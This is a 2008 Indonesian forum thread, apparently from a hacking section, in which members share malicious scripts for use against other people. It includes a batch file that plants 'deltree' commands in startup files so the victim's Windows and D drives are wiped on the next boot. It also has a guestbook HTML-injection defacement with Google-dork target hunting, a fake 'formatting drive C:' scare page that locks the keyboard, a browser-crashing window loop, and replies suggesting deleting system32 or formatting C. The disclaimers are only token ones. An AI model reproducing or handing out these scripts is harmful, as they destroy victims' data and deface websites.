Komunitas Informatika Aneuk Nanggröe

Dengan Agama hidup menjadi terarah, dengan Ilmu hidup menjadi mudah dan dengan seni hidup menjadi indah..!!
 
IndeksPortalFAQPencarianPendaftaranLogin

Share | 
 

 Jangan di coba ya... bahaya...!!!

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Jangan di coba ya... bahaya...!!!   Thu Jul 03, 2008 9:59 pm

Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!


Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:


Code:
@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT


wELL, ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.

Note: cuma buat belajar... resiko tanggung sendiri (jangan bawa2 nama gue ya...)
Kembali Ke Atas Go down
Lihat profil user
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Thu Jul 03, 2008 10:03 pm

Ini ilmu lama, tapi buat share aja....

Guest Book Injection (ngerusak buku tamu di sebuah website)

Buka google untuk cari target, masih ingat artikel yg isinya google hacking kan???! misalnya allinurl:guestbook.php
Nah Setelah itu akan ada add entry message...biasalah form yg ditampilin pas mo ngisi buku tamu
Kita test dulu dengan memasukkan script pada bagian text / message-nya: <h1>test</h1>
Nah Jika Script berhasil maka tulisan test akan berhuruf tebal dan besar...
Jika tulisan test tidak besar dan tebal , maka PHP tersebut Sudah di patch / di update .. cari target lain!!!
Apabila Sukses Maka Balik Lagi ke GuestBook , Masukkan Script lagi di bawah ini:

Code:
</DIV><DIV align=left>
<DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: #000000 1px; WIDTH: 1000px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 10000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000"><b>
<center><br><font face="Courier New"><FONT color=#ff0000>
<span style="font-weight: 400">H A C K E D<br><br>by<br>
<br>[[ Nama Anda ]]<br><br><br>
<marquee>Your SysteM Has Been HaCked !!! Many Bugs In Here !!!</marquee>
<b><br><br>Special Thank's<br>
<br>BiNusHaCkeR TeaM<br><br><br>
<br>Hey admin.......do you a need help ?<br><br>
I am Not Lamer !!! <br><br>
</DIV></DIV>

Nah diliat dech hasilnya di http://www.target.com/namadirnya/guestbook.php
Selesai....
Kembali Ke Atas Go down
Lihat profil user
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Thu Jul 03, 2008 10:10 pm

Ngisengin komputer temen loe...

Bikin dia keringat dingin... lol! lol! lol!

Code:

<html>

<body onkeydown=handlePress(event) onunload="window.open(location)" onload="start()">

<br>
<br>&nbsp;<br>

<SCRIPT LANGUAGE="JavaScript">
function handlePress(e)
{return false;}
</SCRIPT>

<script>

function prcheck()
{
progr=1;d1=op.document.all.d2;prmsg="Formatting drive C:\ ";
i1=setInterval("d1.innerHTML=prmsg + progr++ +\"%\"",2000);
};

op=window.createPopup();
s='<body><table bgcolor="#0000F4" width="100%" height="100%"><tr ALIGN=LEFT VALIGN=TOP><td height=157></td></tr><tr>';
s+='<td>';
s+='<center><b><font color="#ffffff" face="Helvetica, Arial, sans-serif"><h2>Browser Error -- ISI PESAN YANG MO LOE TAMPILIN --</h2>General protection fault<br>EAX=5435 EBX=6541 EIP=*Unable to fix it<br><div id="d2">Formatting drive C:\ </div></font></b></center></td>';
s+='</tr></table></body>';

op.document.body.innerHTML=s;

function oppop()
{
if (!op.isOpen)
{
op.show(0,0,screen.width,screen.height,document.body);
}
}

function start()
{
oppop();
setInterval("window.focus(); {oppop();}",1);
prcheck();
}

</script>
</body>
</html>

KLo loe orang baik mending gak usah deh pake script ni, kasian juga temen loe kan...
Kembali Ke Atas Go down
Lihat profil user
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Thu Jul 03, 2008 11:03 pm

BUAT ISENG DOANK :

Dear friend.... dalam edisi kali ini (hehehe.. emangnya majalah.. Razz ) AKU akan ngajak kamu untuk "bermain-main" dengan JavaScript. Judulnya memang terkesan "ganas!!" tapi percaya dech bahwa isinya tak lebih dari sekedar permainan kecil. Coba kamu perhatikan script berikut:
Code:

<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=index.html">
<SCRIPT LANGUAGE="JavaScript">
<!--
for (x=0;x<1;x)
open("index.html");
</SCRIPT>
</HEAD>
</body>
</HTML>

Copy dan pastekan di notepad lalu simpan dengan nama index.html dan jalankan (pakai Internet Explorer yach... atau pakai Netscape Navigator) maka kamu akan menyaksikan pemandangan mengerikan hihihihihi... Saat file index.html tersebut dijalankan, maka komputer akan membuka banyak sekali jendela browser sampai tak terhingga banyaknya hingga windows hang atau crash!! How it can be??? Instruksi dari javascript diatas adalah perintah untuk memanggil diri-sendiri tanpa berhenti dengan sangat cepat. Hmm.. menyenagkan bukan?? Lalu pemanfaatan dari script diatas untuk apa?? Terserah kamu... yang jelas AKU tidak bertanggungjawab atas segala penyalahgunaan yang terjadi.
Kembali Ke Atas Go down
Lihat profil user
Eleanor
SD


Jumlah posting : 57
Lokasi : masi di tempat dulu kok lom pindah2...^^
Registration date : 21.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Fri Jul 04, 2008 2:51 am

dr. vaako wrote:
Ini ilmu lama, tapi buat share aja....

Guest Book Injection (ngerusak buku tamu di sebuah website)

Buka google untuk cari target, masih ingat artikel yg isinya google hacking kan???! misalnya allinurl:guestbook.php
Nah Setelah itu akan ada add entry message...biasalah form yg ditampilin pas mo ngisi buku tamu
Kita test dulu dengan memasukkan script pada bagian text / message-nya: <h1>test</h1>
Nah Jika Script berhasil maka tulisan test akan berhuruf tebal dan besar...
Jika tulisan test tidak besar dan tebal , maka PHP tersebut Sudah di patch / di update .. cari target lain!!!
Apabila Sukses Maka Balik Lagi ke GuestBook , Masukkan Script lagi di bawah ini:

Code:
</DIV><DIV align=left>
<DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: #000000 1px; WIDTH: 1000px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 10000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000"><b>
<center><br><font face="Courier New"><FONT color=#ff0000>
<span style="font-weight: 400">H A C K E D<br><br>by<br>
<br>[[ Nama Anda ]]<br><br><br>
<marquee>Your SysteM Has Been HaCked !!! Many Bugs In Here !!!</marquee>
<b><br><br>Special Thank's<br>
<br>BiNusHaCkeR TeaM<br><br><br>
<br>Hey admin.......do you a need help ?<br><br>
I am Not Lamer !!! <br><br>
</DIV></DIV>

Nah diliat dech hasilnya di http://www.target.com/namadirnya/guestbook.php
Selesai....

hasil na......??? PAGE NOT FOUND !!!!

Ap emng gitu jadi na....??
ato..??
trus pesan na muncul dimana...?
Kembali Ke Atas Go down
Lihat profil user
Eleanor
SD


Jumlah posting : 57
Lokasi : masi di tempat dulu kok lom pindah2...^^
Registration date : 21.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Fri Jul 04, 2008 3:03 am

dr. vaako wrote:
Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!


Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:


Code:
@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT


wELL, ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.

Note: cuma buat belajar... resiko tanggung sendiri (jangan bawa2 nama gue ya...)


itu wat ngapus starup na ya...??

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT
echo deltree /y d:\*.*>> AUTOEXEC.BAT


ngapus folder winds ya..? ato... AUTOEXEC.BAT aja..?
Kembali Ke Atas Go down
Lihat profil user
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Fri Jul 04, 2008 9:06 pm

Yg guestbook tu tes dulu di site korban, bisa ngak nerima inputan tag html. Klo bisa seperti yg udah aku jelasin, huruf yg kita masukin pasti jadi gede krn di apit ma tag html <h1></h1>.

Klo huruf yg tampil gak gede berarti php'a udah di patch, cari ja site yg laen.

Tp klo huruf yg tampil gede berarti tu site bisa di inject, masukin ja script yg udah aku ksh.

Setelah di submit, coba buka lg halaman guest book'a, berdo'a ja dulu moga berhasil...

Klo mksd loe link yg ni : http://www.target.com/namadirnya/guestbook.php

Jls ja not found, tu kan contoh aja. Misalnya : www.namasitekorban.com/guestbook.php

Klo script yg AUTOEXEC.BAT....

Loe coba ja, ntar juga ketahuan apa'a yg di hapus... lol! lol! lol!

TRY N ERROR... klo error gue gak tanggung jawab ya coz script tu cuma buat share ja...

Kan sebelumnya gue dah bilang di judul postingan ni "Jangan di coba ya... bahaya...!!!"

Klo loe tetap mo nyoba itu urusan loe... Laughing Laughing Laughing
Kembali Ke Atas Go down
Lihat profil user
Eleanor
SD


Jumlah posting : 57
Lokasi : masi di tempat dulu kok lom pindah2...^^
Registration date : 21.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Sat Jul 05, 2008 12:27 am

huheheheh..... autoexec.bat kehapus .....??
ndak pa2 tu... Surprised itu bkln ada lagi.... hehe


kecualiii...... NTDETECT.COM ato ntldr jamin de... mokad winds U....

klo mau coba ini

del c:\WINDOWS\system32\*.*/q

ato terserah de mo del apa....

hack guestbook na kyk na dah ndak mpan lagi tu....
rata2 dah ke pacth smua skarang.... klo thun2 sbelum na kyk na masih bisa...
ato ada yg Admin yg wat buat buku tamu na ndak btul....


lol! lol! lol! lol!
Kembali Ke Atas Go down
Lihat profil user
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Sat Jul 05, 2008 1:25 pm

Yg guestbook'a emang sekarang udah gak bisa lg coz rata2 udah di patch mua ma adminnya, namanya juga ilmu lama. Ya buat pengetahuan aja gak papa kan... geek geek

Tp klo mau lbh teliti msh bayak lo yg blm di patch, semua tergantung dari kesabaran dlm mencari dan menemukan korban... tongue tongue

TETEP SEMANGAT YA... BANZAI... lol! lol! lol!
Kembali Ke Atas Go down
Lihat profil user
sangak
Admin


Male
Jumlah posting : 150
Age : 31
Lokasi : Banda Aceh, NAD
Registration date : 07.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Sat Jul 05, 2008 6:13 pm

Bole.. bole.. yang penting ilmu, kalu ga ada yang lama pasti ga ada yang sekarang dunk.. Laughing
ntar kalu udah ketemu korbannya lapor ke polsek setempat ya.. scratch

_________________


"Ambil itu sebagai Bahan Perenungan..! Kita tidak akan menemukan suatu jawaban kecuali kita terus menggalinya lebih dalam dan semakin dalam..!!"
Kembali Ke Atas Go down
Lihat profil user http://d3mi-unsyiah.forumi.biz
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Sat Jul 05, 2008 7:15 pm

Klo ada korban lapor ke polsek?

Emang korban apaan mas?

Korban lalu lintas, pembunuhan, pemerkosaan, penculikan, penipuan, penganiayaan, pencemaran nama baik, kekerasan, ato korban apa mas...???
Kembali Ke Atas Go down
Lihat profil user
patraa
SD


Male
Jumlah posting : 45
Age : 30
Lokasi : tux home
Registration date : 08.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Sat Jul 19, 2008 3:18 pm

dr.vako anda sungguh luar biasa..bener2 hacker sejati..
mau donk di ajarin tentang yg lainnya..misalkan cara manipulasi benwith dan cara membypas transparent proxy/squid.
mu tambahin satu bolehkan dr.vako??
"login sebagai admin ambil run, tuliskan cmd, setelah tampil layar hitam tulis format c..
bestu jgn lupa kabur...
"di matermur sering terjadi tu.....
kalo ada yg kurang saya minta maaf.. soalnya kurang paham uga tk masalah2 kegini..

ditgu jawabannya ya..Wink) lol!
Kembali Ke Atas Go down
Lihat profil user http://www.vistra32.blogspot.com
dr. vaako
SMP


Male
Jumlah posting : 121
Age : 29
Lokasi : Spooky Island
Registration date : 09.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Sat Jul 19, 2008 9:35 pm

Ah mas patra, siapa bilang saya hacker sejati...?

Ilmu saya gak tinggi2 amat koq, beda ma ilmu yg saudara miliki.
Buktinya saudara udah bisa beli laptop baru dari ilmu yg saudara miliki, ya kan...??? Laughing Laughing Laughing

Ilmu saya masih gak da apa2 nya, masih se-ujung kuku...

Saya ini juga masih bodoh koq, makanya belajar lagi di forum ini... tongue tongue tongue

=======================================================================================================================
"jika kamu seorang hacker yg baik, semua orang mengenalmu...
jika kamu seorang hacker yg hebat, tak seorang pun yg mengenalmu..."
Kembali Ke Atas Go down
Lihat profil user
patraa
SD


Male
Jumlah posting : 45
Age : 30
Lokasi : tux home
Registration date : 08.06.08

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Mon Aug 11, 2008 5:39 pm

waduh dr.vako jgn bawak2 nama leptop lha kan gk enak gini, ni pun cm pya org pinjam bentar..
""CUMA ORANG BODOH YG MENGAKU DIRINYA PINTER""..... Rolling Eyes No No
Kembali Ke Atas Go down
Lihat profil user http://www.vistra32.blogspot.com
lamno
Play Group


Jumlah posting : 7
Registration date : 25.08.09

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Tue Aug 25, 2009 1:46 pm

dr. vaako wrote:
Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!


Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:


Code:
@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT


wELL, ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.

Note: cuma buat belajar... resiko tanggung sendiri (jangan bawa2 nama gue ya...)

judulnya aja udah DELTREE... ya dijamin hapus semua...
Kembali Ke Atas Go down
Lihat profil user
lamno
Play Group


Jumlah posting : 7
Registration date : 25.08.09

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Tue Aug 25, 2009 1:47 pm

perintah DOS doang aja...
Kembali Ke Atas Go down
Lihat profil user
incroops
Play Group


Male
Jumlah posting : 2
Registration date : 29.10.09

PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Thu Oct 29, 2009 11:30 pm

jahat banget ya.. kawkawkwa Very Happy Very Happy Very Happy
Kembali Ke Atas Go down
Lihat profil user http://www.croops.co.cc
Sponsored content




PostSubyek: Re: Jangan di coba ya... bahaya...!!!   Today at 11:25 am

Kembali Ke Atas Go down
 
Jangan di coba ya... bahaya...!!!
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Asyiknya emang rame2, tapi wajib jangan ditiru...
» JANGAN SEMIR BAN SETELAH CUCI MOTOR!!!
» Bahaya stang standard
» bahaya gk make merk ban yg berbeda depan dan blakang!
» MAU TANYA DONG...KNALPOT CUSTOM KIRA2 BAHAYA GAK...?

Permissions in this forum:Anda tidak dapat menjawab topik
Komunitas Informatika Aneuk Nanggröe :: General Category :: Hacking & Cracking-
Navigasi: